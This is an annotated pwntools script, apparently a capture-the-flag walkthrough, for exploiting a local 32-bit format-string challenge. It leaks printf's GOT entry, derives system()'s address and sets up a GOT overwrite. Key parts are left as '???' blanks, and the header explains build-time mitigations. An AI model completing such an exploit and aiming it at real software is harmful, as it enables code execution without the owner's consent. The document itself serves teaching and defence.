#!/usr/bin/env python
# Walkthrough script for the 'fs-code-exec-32' format-string challenge.
# It leaks a libc address through a user-controlled printf format string,
# derives the address of system() from that leak, and then overwrites
# printf's GOT entry in two 16-bit halves.  The '???' placeholders are
# deliberate blanks for the reader to work out; they are not filled in
# here, so the script is not runnable as-is (each '???' is a syntax error).
#
# Defender's view: the root cause is untrusted input reaching printf() as
# the format argument.  -Wformat-security / -Werror=format-security and
# _FORTIFY_SOURCE flag or reject this class of bug at build time, and
# Full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only so the final
# overwrite below has no writable target.
from pwn import *

# Spawn the vulnerable 32-bit binary locally; there is no remote target.
p = process('./fs-code-exec-32')

# arbitrary read -> read the GOT of printf
# p.elf is the ELF object pwntools attaches to the spawned process;
# got['printf'] is the address of printf's GOT slot, which presumably
# already holds the resolved libc address by the time the read happens.
got_of_printf = p.elf.got['printf']
print(p.recv())

# Put the GOT address at the start of the input and dereference it with a
# positional %s; the index 7 is specific to this binary's stack layout.
# NOTE(review): on Python 3 pwntools p32() returns bytes, so this str
# concatenation would raise TypeError there; the shebang suggests the
# script was written for Python 2.
p.sendline(p32(got_of_printf) + "%7$s")
data = p.recv()
print(repr(data))

# The leaked 4 bytes sit somewhere inside the echoed reply; the slice that
# extracts them is left as a placeholder.
libc_printf = u32(data[???])
print(hex(libc_printf))

# system = leaked printf - offset(printf) + offset(system); the two offsets
# depend on the libc build and are left as placeholders.
libc_system = libc_printf - ??? + ???

# Split the 32-bit target into two 16-bit halves.  'first' is presumably
# reduced by the 8 bytes already emitted (the two p32() addresses at the
# start of buf); 'second' is the padding needed after the first write and
# is normalised into [0, 0x10000) because it is taken modulo 16 bits.
lower_16_system = libc_system & 0xffff
first = lower_16_system - 8
second = (libc_system >> 16) - lower_16_system
while second < 0:
    second += 0x10000
print(hex(libc_system))
print(hex(first))
print(hex(second))

# Two write targets: the low half of printf's GOT slot and the high half
# (slot + 2).  The format directives that perform the writes are the
# remaining placeholder and are intentionally not supplied here.
buf = p32(got_of_printf) + p32(got_of_printf + 2)
buf += ????
p.sendline(buf)
p.interactive()